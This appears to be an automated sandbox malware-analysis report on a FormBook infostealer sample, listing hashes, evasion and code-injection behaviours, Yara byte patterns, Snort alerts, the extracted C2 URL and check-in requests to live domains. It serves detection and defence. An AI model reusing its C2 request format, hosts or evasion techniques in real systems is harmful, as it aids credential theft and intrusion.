# Windows Analysis Report 2u2u8wnrrW.exe

## Overview

### General Information

Sample Name: 2u2u8wnrrW.exe
Analysis ID: 502325
MD5: 51dcc89ed1035a6c2fc57ada8dcb4dc2
SHA1: 0e59efbffdd8153c61f20a6039110474c50c20e9
SHA256: 092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14
Tags: exe, Formbook

### Detection

FormBook
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

### Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

### Classification

System is w10x64
2u2u8wnrrW.exe (PID: 6996, cmdline: 'C:\Users\user\Desktop\2u2u8wnrrW.exe', MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
2u2u8wnrrW.exe (PID: 7164, cmdline: C:\Users\user\Desktop\2u2u8wnrrW.exe, MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
explorer.exe (PID: 3440, cmdline: C:\Windows\Explorer.EXE, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
chkdsk.exe (PID: 6464, cmdline: C:\Windows\SysWOW64\chkdsk.exe, MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
cmd.exe (PID: 3324, cmdline: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2440, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Yara rule matches (Source, Rule, Description, Author, Strings):
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
• 0x16ae9:\$sqlite3step: 68 34 1C 7B E1
• 0x16bfc:\$sqlite3step: 68 34 1C 7B E1
• 0x16b18:\$sqlite3text: 68 38 2A 90 C5
• 0x16c3d:\$sqlite3text: 68 38 2A 90 C5
• 0x16b2b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x16c53:\$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Yara rule matches (Source, Rule, Description, Author, Strings):
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
• 0x7818:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x7bb2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x138c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x133b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x139c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x13b3f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x85ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1262c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x9342:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18db7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x19e5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
• 0x15ce9:\$sqlite3step: 68 34 1C 7B E1
• 0x15dfc:\$sqlite3step: 68 34 1C 7B E1
• 0x15d18:\$sqlite3text: 68 38 2A 90 C5
• 0x15e3d:\$sqlite3text: 68 38 2A 90 C5
• 0x15d2b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15e53:\$sqlite3blob: 68 53 D8 7F 8C
Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
## Sigma Overview

No Sigma rule has matched

## Jbx Signature Overview

### AV Detection:

Found malware configuration
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook, C2 list: www.esyscoloradosprings.com/fqiq/, plus a decoy domain list (64 entries)

Multi AV Scanner detection for submitted file
Source: 2u2u8wnrrW.exe Virustotal: Detection: 16%

Yara detected FormBook
Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 11_2_0538387E GetEncryptedFileVersionExt, 11_2_0538387E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 11_2_0537A61C GetEncryptedFileVersionExt, 11_2_0537A61C

Uses 32bit PE files
Source: 2u2u8wnrrW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: 2u2u8wnrrW.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
Source: Binary string: chkdsk.pdb source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 2u2u8wnrrW.exe, chkdsk.exe

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\2u2u8wnrrW.exe Code function: 4x nop then pop ebx 3_2_00406AB9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop ebx 11_2_00AB6AB9

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80

System process connects to network (likely due to code injection or exploit)

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.esyscoloradosprings.com/fqiq/

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1 Host: www.satellitephonstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1 Host: www.seal-brother.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1 Host: www.driventow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1 Host: www.kangrungao.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1 Host: www.healthyweekendtips.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1 Host: www.esyscoloradosprings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 17:59:38 GMT Content-Type: text/html Content-Length: 275 ETag: "615c5dca-113" Via: 1.1 google Connection: close Data Ascii: Forbidden Access Forbidden
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 17:59:50 GMT Content-Type: text/html Content-Length: 275 ETag: "615f9602-113" Via: 1.1 google Connection: close Data Ascii: Forbidden Access Forbidden
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service Unavailable Content-Type: text/html; charset=UTF-8 Content-Length: 884 Connection: close P3P: CP="CAO PSA OUR" Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Data Ascii: Virus/Spyware Download Bloc

URLs found in memory or binary data
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Performs DNS lookups
Source: unknown DNS traffic detected: queries for: www.govindfinance.com

### E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

### System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files
Source: 2u2u8wnrrW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match